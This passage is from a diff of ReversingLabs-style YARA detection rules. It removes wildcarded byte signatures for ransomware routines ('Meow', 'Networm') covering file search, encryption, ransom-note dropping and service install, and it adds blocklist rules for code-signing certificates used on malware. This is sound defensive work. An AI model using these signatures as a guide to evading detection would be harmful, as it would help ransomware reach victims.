-            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85
-            C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89
-            6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 2B 74 24 ?? 1B
-            7C 24 ?? 89 FA 09 F2 74 ?? 8B 44 24 ?? 8B 58 ?? B8 ?? ?? ?? ?? 39 F8 0F 82 ?? ?? ??
-            ?? 39 F3 0F 47 DE E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 DE EB ?? 8B 7C 24 ?? BE ?? ?? ?? ??
-            85 ED 74 ?? 89 2C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? EB
-        }
-		$encrypt_files_4 = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            34 24 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 29 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 19 95 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 D0 89 CA 09 C2 0F 84 ?? ?? ?? ?? 31 D2 3B 95 ??
-            ?? ?? ?? 8B 43 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 72 ?? 77 ?? 8B 8D ?? ?? ?? ??
-            39 C8 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 89 44 24 ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 54 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 89 34 24 8B 35 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 83 EC
-            ?? 89 04 24 FF D6 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 83 EC ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 C7
-            04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            83 EC ?? 89 C1 E8 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            89 04 24 FF 15
-        }
-		$search_files_3 = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 8B 85
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 FF D7 83
-            EC ?? 85 C0 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ?? 90 8D B4 26 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 83 C3 ?? 8B 50 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 29 D0 C1 F8 ?? 69 C0 ??
-            ?? ?? ?? 39 C3 0F 83 ?? ?? ?? ?? 8D 04 5B 8D 34 C5 ?? ?? ?? ?? 8B 04 C2 89 44 24 ??
-            8B 85 ?? ?? ?? ?? 89 04 24 FF D7 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B
-            1C 30 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 5C
-            24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88
-            ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 C7 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F
-            B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 31 F6 E9
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 5C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 90 8D 74 26 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
-            E8
-        }
-		$install_service = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C1 89 44 24 ?? 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0
-            89 C3 0F 84 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? 8D 6C 24 ?? 8D 7C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 7C 24 ?? 89 44 24 ?? FF D0 83 EC
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 E0 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 89 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ??
-            ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC
-            ?? 85 C0 74 ?? 3B 74 24 ?? 8B 44 24 ?? 72 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? 89
-            1C 24 8B 1D ?? ?? ?? ?? FF D3 83 EC ?? 8B 44 24 ?? 89 04 24 FF D3 83 EC ?? 83 C4 ??
-            5B 5E 5F 5D C2 ?? ?? 8D B4 26 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83
-            EC ?? 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 8D B6 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 1C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 89 6C 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ??
-            85 C0 0F 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8B 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ??
-            83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ??
-            81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15
-            ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 74 24 ?? 72 ?? 8B
-            44 24 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? E9
-        }
-		$encrypt_files_5 = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF
-            15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89
-            14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
-            ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
-            ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24
-            ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89
-            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ??
-            89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC
-            ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24
-            ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
-            24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24
-            ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24
-            E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24
-            ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F
-            94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
-            ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24
-            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15
-        }
-		$search_files_4 = {
-            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
-            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
-            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
-            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
-            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
-            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 3B BD ??
-            ?? ?? ?? 75 ?? EB ?? 83 EC ?? 83 C7 ?? 39 BD ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ??
-            89 3C 24 89 D9 E8 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ??
-            ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 F0 8D 65 ?? 5B 5E 5F 5D C2
-        }
-		$remote_connection_3 = {
-            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
-            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
-            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
-            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
-            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
-            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
-            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
-            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ??
-            ?? 89 C3 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 89 1C 24 E8 ?? ?? ?? ?? 89 C3 EB ?? 53 83 EC ?? 8B 5C 24 ?? 8D 43 ?? 89 04 24 8B
-            0B E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 5B C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $search_files and $encrypt_files and $remote_connection ) or ( $encrypt_files_2 and $remote_connection and $search_files ) or ( $search_files_2 and $encrypt_files_3 and $remote_connection_2 ) or ( $install_service and $search_files_3 and $encrypt_files_4 ) or ( $search_files_4 and $encrypt_files_5 and $remote_connection_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" and 1602547200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Meow : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Meow ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7cebb04d-1cda-5ad1-b412-8b38df7b2550"
-		date = "2022-10-24"
-		modified = "2022-10-24"
+		id = "538d7405-be17-519e-beb5-fbef3beaedd3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Meow.yara#L1-L84"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11974-L11990"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b00753d2b150a815279297ddf40d70051d25de1c32bb90f5b706ea7fd36bb871"
+		logic_hash = "839f55e8fe7a86aad406e657fdef48925543b5d3884927104fd3786444a8fccc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Meow"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            72 ?? 8D 45 ?? BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 33 F6 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B4 B5 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C
-            ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 5F 5E 33 C0 5B 8B E5 5D C3 CC 55 8B EC 83 EC
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ??
-            75
-        }
-		$encrypt_files_p2 = {
-            8B 45 ?? 40 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 25 ?? ??
-            ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 74 ?? 8B 4D ?? 8D 46 ?? 03 CF 0F AF C8 89 4D ?? 8B
-            45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 75 ?? B9 ?? ?? ?? ?? 90 8B 45 ?? 99
-            F7 F9 8B 45 ?? 85 D2 74 ?? 48 EB ?? 40 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83
-            C8 ?? 83 C0 ?? 74 ?? EB ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 74 ?? 8B 45 ?? 8D
-            4E ?? 83 C0 ?? 99 F7 F9 B9 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 75 ?? 8B 45
-            ?? 99 F7 7D ?? 8B 45 ?? 85 D2 74 ?? 40 EB ?? 48 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74
-            ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 FF
-            D0 C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 45 ?? 99 F7 F9 8B 45 ?? 85 D2 74 ?? 83 C0
-            ?? 03 C3 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 0F 85
-        }
-		$drop_ransom_note = {
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            FF 74 ?? 8B CF E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 6A
-            ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D0 6A ??
-            68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 8B F0 BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF D0 B9 ?? ?? ?? ?? 8D BD ??
-            ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? 50 66 A5 A4 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD B8 ??
-            ?? ?? ?? 5F 5B 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files = {
-            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
-            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
-            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
-            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kodemika" and pe.signatures [ i ] . serial == "43:5a:bf:46:05:3a:0a:44:5c:54:21:7a:8c:23:3a:7f" and 1616976000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Networm : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Networm ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3b17b97d-c882-5f65-8b89-847e2300873c"
-		date = "2021-07-05"
-		modified = "2021-07-05"
+		id = "c094666a-0bb3-5cb6-82a8-3074b9eed32b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
